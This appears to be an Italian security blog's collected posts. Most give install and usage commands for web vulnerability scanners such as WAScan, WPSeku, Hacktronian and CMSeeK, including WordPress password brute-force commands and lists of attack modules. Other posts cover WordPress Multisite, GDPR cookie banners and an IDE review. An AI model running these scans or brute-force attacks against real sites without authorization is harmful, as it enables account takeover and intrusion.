Vulnerability Scanning "RED_HAWK"

 RED_HAWK: é uno sofware scritto in PHP molto ben fatto; la sua caratteristica e di unire due potenti strumenti in uno
1 Raccolte informazioni 
2 Scansionare possibili vulnerabilità


Testato su Sierra ovvimante sotto Homebrew gestore di pacchetti mancanti per macOS. (Finalmente tradotto anche in Italiano)
Ovvimante è importante installare tutti pacchetti per la gestione PHP del sofware.

Prima della Installazione consiglio sempre di aggiornare Homebrow:

brew update

Installare:

git clone https://github.com/Tuhinshubhra/RED_HAWK redhawk
cd redhawk
php rhawk.php
fix

IMPOPRTANTE
Il comando fix installerà tutti i moduli richiesti.
dopo di che basterà richimare il semplice  php rhawk.php

=================================================================================

Elenco di CMS supportati su RED_HAWK:
è attualmente in grado di rilevare i seguenti CMS (Content Management Systems):
WordPress
Joomla
Drupal
Magento

=================================================================================

Scansioni che sono possibili utilizzando RED HAWK:
Per dettagli consultare la pagina dello sviluppatore:https://github.com/Tuhinshubhra/RED_HAWK

• Scansione di base
  • Titolo del sito NUOVO
  • Indirizzo IP
  • Rilevamento server Web IMPROVED
  • Rilevazione CMS
  • Rilevamento Cloudflare
  • Scanner di robots.txt
• Whois Lookup IMPROVED
• Ricerca geo-IP
• Afferra i banner IMPROVED
• Ricerca DNS
• Calcolatore di sottorete
• Scansione porta Nmap
• Scanner di sottodomini IMPROVED
  • Sottodominio
  • Indirizzo IP
• Ricerca IP inversa e rilevamento CMS IMPROVED
  • Nome host
  • Indirizzo IP
  • CMS
• Scanner SQLi basato su errori
• Blogger Visualizza NUOVO
  • Codice di risposta HTTP
  • Titolo del sito
  • Classifica Alexa
  • Autorità di dominio
  • Autorità della pagina
  • Estrattore di link sociali
  • Link Grabber
• WordPress Scan NOVITÀ
  • Scansione di file sensibili
  • Rilevamento versione
  • Scanner vulnerabilità versione
• crawler
• Ricerca MX NOVITÀ
• Scan for Everything: il vecchio scanner zoppo
  
  
  
  

======================================================================================== Dichiarazione di non responsabilità: l'utilizzo di RED_HAWK per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma. ========================================================================================

Potente scanner di sicurezza (Cybersecurity) Open Source

Progettato per trovare vulnerabilità utilizzando il metodo "black-box", il che significa che non studierà il codice sorgente delle applicazioni Web ma come un fuzzer, scansionando le pagine dell'applicazione Web distribuita, estraendo collegamenti e moduli e attaccando gli script, l'invio di payload e la ricerca di messaggi di errore, ecc. (Link sorgente)
WAScan è basato su python2.7 e può essere eseguito su qualsiasi piattaforma che disponga di un ambiente Python.
Ottimo sofware molto potente e versatile alla nostre esigenze da testare!

Testato su Sierra ovvimante sotto Homebrew gestore di pacchetti mancanti per macOS. (Finalmente tradotto anche in Italiano)

INSTALLAZIONE:

$ git clone https://github.com/m4ll0k/WAScan.git wascan
$ cd wascan 
$ pip install BeautifulSoup
$ python wascan.py

=====================
=============== Features:

Fingerprint:

Content Management System (CMS) -> 6
Web Frameworks -> 22
Cookies/Headers Security
Languages -> 9
Operating Systems (OS) -> 7
Server -> ALL
Web App Firewall (WAF) -> 50+

$ python wascan.py --url http://xxxxx.com/ --scan 0

 

Attacks:

Bash Commands Injection
Blind SQL Injection
Buffer Overflow
Carriage Return Line Feed
SQL Injection in Headers
XSS in Headers
HTML Injection
LDAP Injection
Local File Inclusion
OS Commanding
PHP Code Injection
SQL Injection
Server Side Injection
XPath Injection
Cross Site Scripting
XML External Entity

$ python wascan.py --url http://xxxxx.com/index.php?id=1 --scan 1

 

Audit:

Apache Status Page
Open Redirect
PHPInfo
Robots.txt
XST

$ python wascan.py --url http://xxxxx.com/ --scan 2

Bruteforce:

Admin Panel
Common Backdoor
Common Backup Dir
Common Backup File
Common Dir
Common File
Hidden Parameters

$ python wascan.py --url http://xxxxx.com/ --scan 3

Disclosure:

Credit Cards
Emails
Private IP
Errors -> (fatal errors,...)
SSN

 

$ python wascan.py --url http://xxxxx.com/ --scan 4

Full Scan:

$ python wascan.py --url http://xxxxx.com --scan 5 

Bruteforce Hidden Parameters:

$ python wascan.py --url http://xxxxx.com/test.php --brute

Advanced Usage:

$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --data "id=1" --method POST
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx 
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321"
$ python wascan.py --url http://xxxxx.com/test.php --scan 5 --auth "admin:1234" --proxy xxx.xxx.xxx.xxx --proxy-auth "root:4321 --ragent -v

 

========================================================================================
Dichiarazione di non responsabilità: l'utilizzo di WAScan per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
========================================================================================

Web vulnerability scanner

Un semplice ma potente Wordpress scanner scritto in python (2.7) basato sul lavoro di WPScan (versione Ruby), ed alcune funzionalità sono ispirate a WPSeku altro noto Scanner, anche per la funzionalità di effettuare attacchi bruteforce. LINK UFFICIALE

Testato su macOS Sierra.
Ovvimante sotto Homebrew gestore di pacchetti mancanti per macOS. (Finalmente tradotto anche in Italiano)

Installazione:

git clone https://github.com/swisskyrepo/Wordpresscan.git
cd Wordpresscan

virtualenv .venv -p /usr/bin/python2.7
source .venv/bin/activate
pip install -r requirements.txt

Una volta fatto installate tutte le dipendeze che variano a seconda della tua configurazione iniziale, se tutto è andato a buon fine lanciamo il programma:

cd Wordpresscan
python2.7  wordpresscan.py

 Le istruzioni sono tutte molto simili a i fratellini WPSeku e WPScan:

 - bruteforce customs usernames:

python2.7 wordpresscan.py -u "http://127.0.0.1/wordpress/" --brute --usernames "admin,guest" --passwords-list fuzz/wordlist.lst

- bruteforce con usernames list:

python2.7 wordpresscan.py -u "http://127.0.0.1/wordpress/" --brute --users-list fuzz/wordlist.lst --passwords-list fuzz/wordlist.lst

- bruteforce detected users:

python2.7 wordpresscan.py -u "http://127.0.0.1/wordpress/" --brute --passwords-list fuzz/wordlist.lst

 ========================================================================================
Dichiarazione di non responsabilità: l'utilizzo di Wordpresscan per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
========================================================================================

Hacktronian - Per Linux & Android

Link Download

Tools & Frameworks testato su macOS Sierra!
Ovvimante sotto Homebrew gestore di pacchetti mancanti per macOS. (Finalmente tradotto anche in Italiano)
Testato con successo e provato nonostante nato per sistemi Linux come Kali  a regaito bene alla mia installazione, non tutti pacchetti danno compatibilità su macOS Sierra perché studiati per Linux e Android, ma nel complesso e da provare, scritto in Python 2.

Installazione Linux o macOS (Homebrew)

============================================================================

Questo tool deve funzionare come ROOT (sudo)!

git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
./install.sh

Lancio del Tool:

cd hacktronian
python2 hacktronian.py

Installazione Android (non ancora testo)

============================================================================

Sotto terminale Termux

pkg install git
pkg install python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py

HACKTRONIAN Menu :

1 Information Gathering
2 Password Attacks
3 Wireless Testing
4 Exploitation Tools 5 Sniffing & Spoofing
6 Web Hacking
7 Private Web Hacking
8 Post Exploitation
9 Install The HACKTRONIAN

=============================================================================

Ma vediamo le potenzialita:

Information Gathering:
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips

Password Attacks:
Cupp
Ncrack

Wireless Testing:
reaver
pixiewps
Fluxion

Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn

Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer

Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework

Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare

Post Exploitation:
Shell Checker
POET
Weeman

 ========================================================================================
Dichiarazione di non responsabilità: l'utilizzo di Hacktronian per testare o sfruttare siti Web e Reti Wifi senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
========================================================================================

Web Scanner WP security

WPseku software scritto in Python 3, testato su macOS Sierra. link = github/WPSeku
Ovvimante sotto Homebrew gestore di pacchetti mancanti per macOS. (Finalmente tradotto anche in Italiano)

WPSeku è un web scanner per valutare e analizzare anche in locale vulnerabilità del noto CMS WordPress, inoltre è possibile anche lanciare degli attacchi brute force associando la tua wordlist.txt.

Installazione tramite terminale:

$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py

Usiamo WPSeku:

Impostaimo il primo comando il più semplice

python3 wpseku.py --url https://www.sitoinquestione.com --verbose

Qundi una volta partito il comando WPSeku farà uno scanner completo e se fattibile ci potrà dare tutte le informazioni necessarie. Una delle più importante sono i famosi Username per poi tentare un brute force - spesso delle volte lasciato in admin (id1) ancora più grave;
dato che si denota una non coltura alla Cyber Security permettendo molti altri tipi di attacchi.

Per visualizzare tute le oprazioni che possiamo svolgere bastera usdare questo comando:

python3 wpseku.py

Bruteforce:

Nulla di più semplice una volta raccolto tutti i dati ed eventuali utenti per un esempio admin:

python3 wpseku.py --url https://www.sitoinquestione.com --brute --user admin --wordlist wl.txt --verbose

========================================================================================
Dichiarazione di non responsabilità: l'utilizzo di WPseku per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
========================================================================================

Gestire WordPress in Multisite Pro e Contro

WordPress Multisite è una funzionalità nativa del core di WordPress e non richiede l’aggiunta di alcun plugin.
Può rivelarsi estremamente utile per chi si occupa della gestione di più siti (sottocartelle o sottodomini),
inoltre tutti i plugin vengono condivisi in una unica installazione.

Implementare il Multisite

 Questa operazione va fatta subito dopo l'installazione di WordPress senza usare plugin, per poter gestire al meglio questa funzionalità.
1 Installare WordpPress come da prassi
2 Aprire file wp-config.php e aggiungi prima della riga di codice (Vedi Immagine)

/* Finito, interrompere le modifiche! Buon blogging */

Aggungere questa riga: (Questo per la nuova versione di Wordpress 5.0)

define( 'WP_ALLOW_MULTISITE', true );

3 Salvare il file

Fatto questo il tuo WordPress è pronto nella gestione del Multiside;
All'interno del pannello di amministrazione WordPress  cerchiamo la voce Strumenti il comando Configura Rete (Network Setup)



Seguendo le istruzioni che ti verrando fornite, dovrai andare ad inserire il codice che ti verrà dato all’interno dei file wp-config.php e il file .htaccess che ti permetterà di attivare immediatamente le nuove funzionalità.
Il seguito e molto semplice sia nella gestione degli utenti e del super admin che gestirà l'interno sistema.

Gestione  Temi e Plugin:
All’interno della schermata di gestione del network, naviga all’interno di Temi o di Plugin e clicca Aggiungi Nuovo.Qui puoi procedere, installando il tema o il plugin che desideri. Se lo desideri, puoi attivare temi e plugin per tutta la rete di siti, altrimenti clicca Modifica in corrispondenza di un sito, naviga nella tab Temi e attiva il tema solamente per quel singolo sito.

Conclusioni Pro Multisite:

Questa funzionalità è molto utile nei casi in cui si gestisca reti di siti costruiti all’interno di sottodomini o sotto cartelle,
sopratutto nello sviluppo del Multilingua senza l'uso di plugin ad essi associati, che a mio dire sono moltopesanti e spesso possono presentare problematiche con il tempo (poco supporto da parte dello sviluppatore).
Una velocità nel mantenerte aggiornata l'intera rete visto che temi e plugin sono condivisi e non si debbano fare doppie installazioni.
Quinidi tutte le nuove funzionalità fatte Code possono essere sfruttate per tutta la rete di sotto domini o cartelle.

Conclusioni Contro Multisite:

Va però considerata una delle fasi più importati nello sviluppo con il noto CMS WordPress "la sicurezza."
Abbiamo già parlato come noti o meno noti programmi riescano a fornirci tutte le informazini sul nostro WP e adirittura attacchi come il brute force.
=========================================================
Un piccolo esempio ma molto pratico (Testati e vermante potenti)

- CMSeeK v1.1.2
- Golismero Project web scanner
- WebReaver Vulnerability Scanner Wordpress
- Wpscan
Vedi tutto all'interno della sezione cyber-security
=========================================================

Come già noto WordPress e il CMS più usato per tanti motivi ma anche il più attaccato; implementando il Multisite non si la sicurezza dell'intera rete, dato che basta entrare in una falla del WP principale che si accede a tutta la rete potendola compromettre.
In pratica ogni sitema di sicurezza si basa su sitemi autonomi, ove se si compromette un solo singolo file questo rimane all'interno di un sitema chiuso, ma questo con il Multisite non avviene.
Quindi si dovrà lavorare molto bene sia lato server (non prendere i più economici) e lato code, pochi plugin e molta manutenzione e monitoraggio per evitare falle e  quindi visite inaspettate!

Free PHP, HTML, CSS, JavaScript editor - Codelobster IDE

Released: March 26, 2020

In this article, we suggest you to get acquainted with the free editor of web languages - Codelobster IDE. It is presented on the software market for a long time already, and it wins a lot of fans.

Codelobster IDE allows you to edit PHP, HTML, CSS and JavaScript files, it highlights the syntax and gives hints for tags, functions and their parameters. This editor easily deals with those files that contain a mixed content.

If you insert PHP code in your HTML template, then the editor correctly highlights both HTML tags and PHP functions. The same applies to CSS and JavaScript code, which is contained in HTML files.

The program includes auto-completion function, which greatly speeds up the programmer's work and eliminates the possibility of errors.

Codelobster IDE provides contextual help on all supported programming languages, it uses the most up to date documentation at this moment, downloading it from official sites. So we can quickly get a description of any HTML tag, CSS attribute, PHP or JavaScript function by pressing the F1 key.

The built-in PHP debugger allows you to execute PHP scripts step by step, sequentially moving through the lines of code. You can assign check points, view the process of the work of loops, and monitor the values of all variables during the execution of the script.

You can view the HTML templates directly in the editor, highlight the interesting elements on the page and explore the associated CSS styles. HTML and CSS inspector works by the principle of all known FireBug

Other useful functions and features of the IDE:

• A pair highlighting of parentheses and tags - you will never have to count parentheses or quotation marks, the editor will take care of it.
• Highlighting of blocks, selection and collapsing of code snippets, bookmarks to facilitate navigation on the edited file, recognition and building of the complete structure of PHP projects - these functions ensure easy work with projects of any scale.
• Support for 17 user interface languages, among them English, German, Russian, Spanish, French and others.
• The program works on the following operation systems: Windows 7, Windows 8, Windows 10, Mac OS, Linux, Ubuntu, Fedora, Debian.

The professional version of Codelobster IDE provides the programmer with even more features.

For example, you have an opportunity to work with projects on a remote server with use of the built-in FTP client. You can edit the selected files, preview the results and then synchronize the changes with the files on the hosting.

In addition the professional version includes an extensive set of plug-ins:

• Fully implemented support for JavaScript libraries, such as jQuery, Node.js, AngularJS, BackboneJS and MeteorJS.
• A large set of extensions that help to work with PHP frameworks - CakePHP, CodeIgniter, Laravel, Phalcon, Smarty, Symfony, Twig and Yii plug-ins.
• Plugins for working with the most popular CMS - Drupal, Joomla, Magento and WordPress.

We can download and install any framework directly from the program without being distracted from the main tasks.

In general, for a year of work, our team had no complaints against the editor. Codelobster IDE works fast, does not hang and allows us to work even with large PHP projects.

You can download Codelobster IDE from the official website codelobsteride.com

 

 

Non chimatelo Web Scanner e molto di più!

Golismero GoLismero è un framework software gratuito per test di sicurezza.
Attualmente è orientato verso la sicurezza Web, ma può essere facilmente esteso ad altri tipi di scansioni. Può eseguire i propri test di sicurezza e gestire molti strumenti di sicurezza ben noti (OpenVas, Wfuzz, SQLMap, DNS Recon, analizzatore di robot ...), portare i loro risultati, il feedback al resto degli strumenti e unire tutti i risultati. E tutto questo automaticamente.
Scritto in Python e molto veloce e prfomante!

Che potete trovare QUI: www.golismero.com/

Provato da poco e devo dire un ottimo strumento per verificare la sicurezza web, questo framework mi ha lasciato senza parole!
Integra al suo interno molti strumenti famosi per la loro efficacia, come: SqlMap, Nmap... e molti altri!

Testato su MAC OS X sitema operativo Sierra
Andiamo ad installare e a verificare:
1 Scaricare la versione Multi Piattaforma con 20 plugin all'interno - python 2.7.x Scarica
2 Installa via termianale Homebrew:

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Con tutte le sue dipendenze per far girare python 2.7

3 Comandi da termianale per avviare Golismero GoLismero:

cd golismero-master
python2.7 golismero.py www.esempio-sito.it

Usando i comandi a vista si possono verifiacere scanner nello specifico.
Ottimo Stumento!!!

Un ringraziamanto al Team di sviluppo: Daniel García A.K.A. cr0hn, Mario Vilas, Raúl Requero.

Golismero Project

Dichiarazione di non responsabilità: l'utilizzo di Golismero Project per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

Normativa sui Cookie ecco la soluzione più veloce anche su WordPress

Spesso inserire la normativa su Cookie per le nuove normative UE diventa un lavoro in più, sopratutto per piccoli progetti.
Implementate questa normativa e semplice su Wordpress la magguor parte delle volte si usano dei Plugin (che come sappiamo potrebbero essere fonte di malentenzionati).
Per evitare tutto questo ma sopratutto per rendere vermante veloce il nostro lavoro ci vine in appoggio cookieconsent.insites.com.

Ci consente in tempi veloci di implementare il nostro banner e tutto FREE! ma sopratutto funzionate!

 

 

Si può configuare il tuo banner sia nel designe che nel testo e nel possibile link da inserire.

Nella Pagina: cookieconsent.insites.com/download

<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css" />
<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#5a24fb"
    },
    "button": {
      "background": "#000000"
    }
  },
  "showLink": false,
  "position": "bottom-right",
  "content": {
    "message": "Questo sito utilizza cookie, anche di terze parti, per migliorare la tua esperienza e offrire servizi in linea con le tue preferenze. Acconsenti all’uso dei cookie installati",
    "dismiss": "Acconsento"
  }
})});
</script>

 Possiamo configuare il nostro banner come il codice demo sopra

General Data Protection Regulation...

Il 25 Maggio 2018 entrerà in vigore il nuovo regolamento europeo generale sulla protezione dei dati denominato GDPR: General Data Protection Regulation.
Sarà applicato a tutti i tipi di imprese che offrono servizi o prodotti a persone che si trovano nel territorio dell’Unione Europea.
Considerando tale vasta applicazione della normativa e la frequenza con la quale la stampa, e i criminali informatici stessi, divulgano notizie riguardanti le perdite di dati sensibili.

Normativa giusta ma a mio dire scritta da burocrati che a livello tecnico non si rendono conto delle difficoltà che può comportare a livello di sviluppo web.

Ricordo che nella normativa Google Analytics se imposato con ID anonimo " ga('set', 'anonymizeIp', true);" viene considerato un cooki tecnico.
quindi esonerato dal consenso e quindi la disattivazione nella sua parte prima del consenso - vedi esempio:

 <script>
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
 ga('create', 'UA-00000000-0', 'auto');
 ga('set', 'anonymizeIp', true);
 ga('send', 'pageview');
</script>

Wordpress

WordPress grazie alla sua catena di sviluppatori a gia messo in piedi validi Pluign.
Il più valido per un sito non troppo corposo e "Ultimate GDPR Compliance Toolkit" a un costo di 19,00$ ma fa bene il suo lavoro.

Soddisfare TUTTI I REQUISITI GDPR, quali:
Accesso ai dati - Modulo dedicato per consentire agli utenti di accedere ai dati personali attualmente memorizzati,
Diritto di essere dimenticati - Modulo dedicato per gli utenti che richiedono la cancellazione dei dati memorizzati,
Sfoglia le richieste degli utenti per l'accesso / eliminazione dei dati e imposta notifiche e-mail personalizzate
Informativa sulla privacy: consente di impostare i reindirizzamenti per le pagine Termini e condizioni e Informativa sulla privacy fino a quando non viene fornito il consenso
Consensi sui cookie: crea una casella dedicata per il consenso sui cookie e blocca tutti i cookie fino a quando non viene fornito il consenso
Aggiungi automaticamente caselle di consenso per vari moduli sul tuo sito web
Violazione dei dati - inviare notifiche e-mail globali sulla violazione dei dati
Pseudonimizzazione - pseudonimizzazione di alcuni dati dell'utente memorizzati nel database.
Integrazioni predefinite per i più diffusi plugin WordPress come WooCommerce, Contact Form 7, Gravity Forms, Mailchimp, Events Manager, BuddyPress, Formidable Forms e molto altro!
Verifica i plugin attualmente attivati ​​per la conformità GDPR
Facile integrazione per plugin personalizzati
Gestisci tutto facilmente tramite il tuo pannello di amministrazione di WordPress
5 * Assistenza clienti
Documentazione online

ho avuto modo di testarlo e funziona molto bene.

Se non abbiamo troppe pretese per mini siti anche questo plugin è valito (Free): Cookie Notice 

 

Come rimuovere il meta Tag 'WP Bakery Page Builder'

Da inserire all'interno del file function.php; Sotto 3 metodi per escludere il meta tag.

 <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>

Remove VC Generator Option #1 Snippet:

add_action('wp_head', 'myoverride', 1);
function myoverride() {
  if ( class_exists( 'Vc_Manager' ) ) {
    remove_action('wp_head', array(visual_composer(), 'addMetaData'));
  }
} 

Remove VC Generator Option #2 Snippet:

 //remove a metatag (Powered by Visual Composer) from the wordpress
add_action('init', 'optimize_fixwp_head', 100);
function optimize_fixwp_head() {
 remove_action('wp_head', array(visual_composer(), 'addMetaData')); 
}

Remove VC Generator Option #3 Snippet:

 //remove vc generator
add_action('wp_head', 'novcgen', 1);
function novcgen() {
 if ( class_exists( 'Vc_Base' ) ) {
 remove_action('wp_head', array(visual_composer(), 'addMetaData'));
 }
}

Pentesting da Mac OS X

Molte delle persone che utilizzano Mac OS X e si dedicano al mondo della sicurezza dipendono dall'utilizzo di macchine virtuali per eseguire controlli. Di solito le persone scelgono sempre distribuzioni preparate con tutti i tipi di strumenti come Kali Linux o  Parrot Project

Queste distribuzioni ci danno la possibilità e la facilità di avere un sistema operativo pronto a fare ogni tipo di hacking e pentesting.
Altre persone scelgono di scegliere un sistema operativo Linux o Windows e installano solo gli strumenti che si sono abituati ai propri controlli.
Tuttavia, queste soluzioni richiedono che gli utenti di OS X dipendano da macchine virtuali.

È vero che esistono diversi programmi multipiattaforma per Windows, Linux e Mac OS X. Tuttavia, installare tutti questi programmi o prendere tutti i programmi offerti su Kali Linux Mac OS X richiede un ottimo lavoro.

Devi passare molto tempo a cercare ognuno dei programmi, anche se alcuni programmi non richiedono un'installazione complessa, per essere un semplice script in Python o in un'applicazione Java, molti altri richiedono la compilazione.
Questo è probabilmente il motivo principale per cui le persone usano le distribuzioni già preparate.
Da questa esigenza è nata l'idea di K0SASP.

 Che cos'è? 

Kontrol0-Security Software Pack Auditor, K0SASP nella sua abbreviazione, è un pacchetto di installazione che include un gran numero di programmi portati su Mac OS X, organizzati per categoria.

Senza la necessità di dover cercare e compilare.
Quando si installano alcuni degli strumenti necessari per controllare alcuni altri software di terze parti è necessario. Ad esempio nel caso del framework Metasploit è necessario che questo abbia precedentemente installato il pacchetto Xcode Command Line Tools. Questo software è installato di default quando si installa msf da K0SASP.

K0SASP facile installazione di tutti i programmi. Quando viene installato K0SASP, ed è selezionato alcuni altri programmi che richiedono queste dipendenze, vengono anche installati di default senza che l'utente debba fare nulla.
Con questo pacchetto, l'installazione di K0SASP esegue una serie di script che sono responsabili della distribuzione di ciascuna applicazione e installano tutte le dipendenze necessarie.
Una volta installato il software, possiamo avere una vasta gamma di possibilità per giocare con Hacking.

Che software include?

Attualmente l'ultima versione di K0SASP include software per analisi forense, web di Pentesting, sniffing, analisi di vulnerabilità, ecc.
Ogni programma che include l'installazione di K0SASP organizza le applicazioni in categorie in base alla loro funzionalità.

 

 

Elenco degli strumenti inclusi:

Information Gathering

✓ Amap
✓ Automater
✓ CaseFile
✓ arpscan
✓ dnmap
✓ Fierce
✓ GoLismero
✓ hping3
✓ Maltego Teeth
✓ masscan
✓ Nmap
✓ Zenmap
✓ know-scan
✓ Recon-ng
✓ theHarvester
✓ URLCrazy

Network Tools

✓ Autossh
✓ SET
✓ Exploit pack
✓ search-exploits

Forensics Tools

✓ pdf-parser
✓ pdfid
✓ peepdf
✓ OSXAuditor-master
✓ Binary Cookie reader

Web Applications

✓ Burp Suite
✓ nikto
✓ DirBuster
✓ fimap
✓ jSQL
✓ sqlmap
✓ Vega
✓ Wfuzz
✓ mitmproxy
✓ mitmdump
✓ zaproxy
✓ webscarab
✓ wapiti
✓ SQL injector

Stress Testing

✓ SlowHTTPTest
✓ THC-SSL-DOS

Sniffing & Spoofing

✓ Cocoa Packect Analyzer
✓ sslstrip
✓ Wireshark
✓ tcpdump

Password Attacks

✓ crunch
✓ hash-identifier
✓ THC-Hydra
✓ pw-inspector
✓ John the Ripper
✓ Ncrack
✓ phrasendrescher
✓ RSMangler
✓ pipal

Maintaining Access

✓ tunna
✓ sbd
✓ Weevely

Reporting Tools

✓ KeepNote
✓ MagicTree

 

Attualmante aspettiamo l'ultima versione più attuale... k0sasp download

 

CMSeeK v1.1.2 - CMS Detection And Exploitation Suite - Scansione di WordPress, Joomla, Drupal e oltre 170 altri CMS
8:52 AM | POST SPONSORIZZATO DA FARADAYSEC | AMBIENTE MULTIUTENTE PENTEST
ZION3R
Facebook

Cos'è un CMS?
Un sistema di gestione dei contenuti (CMS) gestisce la creazione e la modifica di contenuti digitali. In genere supporta più utenti in un ambiente collaborativo. Alcuni esempi notevoli sono: WordPress, Joomla, Drupal ecc .

Faraday

Cronologia delle versioni
- Version 1.1.2 [19-05-2019]
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...
Funzioni del file Changelog

di CMSeek:
Rilevazione CMS di base di oltre 170 CMS
Rilevamento della versione di Drupal
Scansioni Wordpress avanzate
Rileva la versione
Enumerazione utente
Enumerazione di plug-in
Enumerazione dei temi
Rileva gli utenti (3 metodi di rilevamento)
Cerca le vulnerabilità della versione e molto altro!
Scansioni avanzate di Joomla
Rilevamento della versione
Trova file di backup
Cercatore di pagine di amministrazione
Rilevamento vulnerabilità principale
Controllo elenco directory
Config rilevamento perdite
Varie altre verifiche

Sistema modulare bruteforce
Usa i moduli bruteforce pre-creati o creane uno tuo e integralo con esso

Requisiti e compatibilità:
CMSeeK è costruito usando python3 , avrete bisogno di python3 per eseguire questo strumento ed è compatibile con i sistemi basati su Unix sin d'ora. Il supporto di Windows verrà aggiunto in seguito. CMSeeK si affida a git per l'aggiornamento automatico, quindi assicurati che git sia installato.

Installazione e utilizzo:
È abbastanza facile usare CMSeeK, assicurati di avere python3 e git (solo per la clonazione del repository) installati e usa i seguenti comandi:
git clone https://github.com/Tuhinshubhra/CMSeeK
cd CMSeeK
pip / pip3 installa -r requirements.txt
Per la scansione guidata:
python3 cmseek.py
Altro:
python3 cmseek.py -u <target_url> [...]
Menu Aiuto dal programma:
USAGE:
python3 cmseek.py (for guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, --list LIST Path of the file containing list of sites
for multi-site scan (comma separated)

MANIPULATING SCAN:
-i cms, --ignore--cms cms Specify which CMS IDs to skip in order to
avoid flase positive. separated by comma ","

--strict-cms cms Checks target against a list of provided
CMS IDs. separated by comma ","

--skip-scanned Skips target if it's CMS was previously detected.

RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)

USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent

OUTPUT:
-v, --verbose Increase output verbosity

VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit

HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result

EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

Verifica dell'aggiornamento:
è possibile controllare l'aggiornamento dal menu principale o utilizzarepython3 cmseek.py --updateper verificare l'aggiornamento e applicare l'aggiornamento automatico.
PS: assicurati di averlogitinstallato, CMSeeK usa git per applicare l'aggiornamento automatico.

Metodi di rilevamento:
CMSeek rileva CMS tramite quanto segue:
Intestazioni HTTP
Meta tag generatore
Codice sorgente della pagina
robots.txt

CMS supportati:
CMSeeK attualmente può rilevare più di 170 CMS. Controlla qui la lista:file cmss.py che è presente nellacmseekdbdirectory. Tutti i cms sono memorizzati nel seguente modo:
cmsID = {
'name':'Name Of CMS',
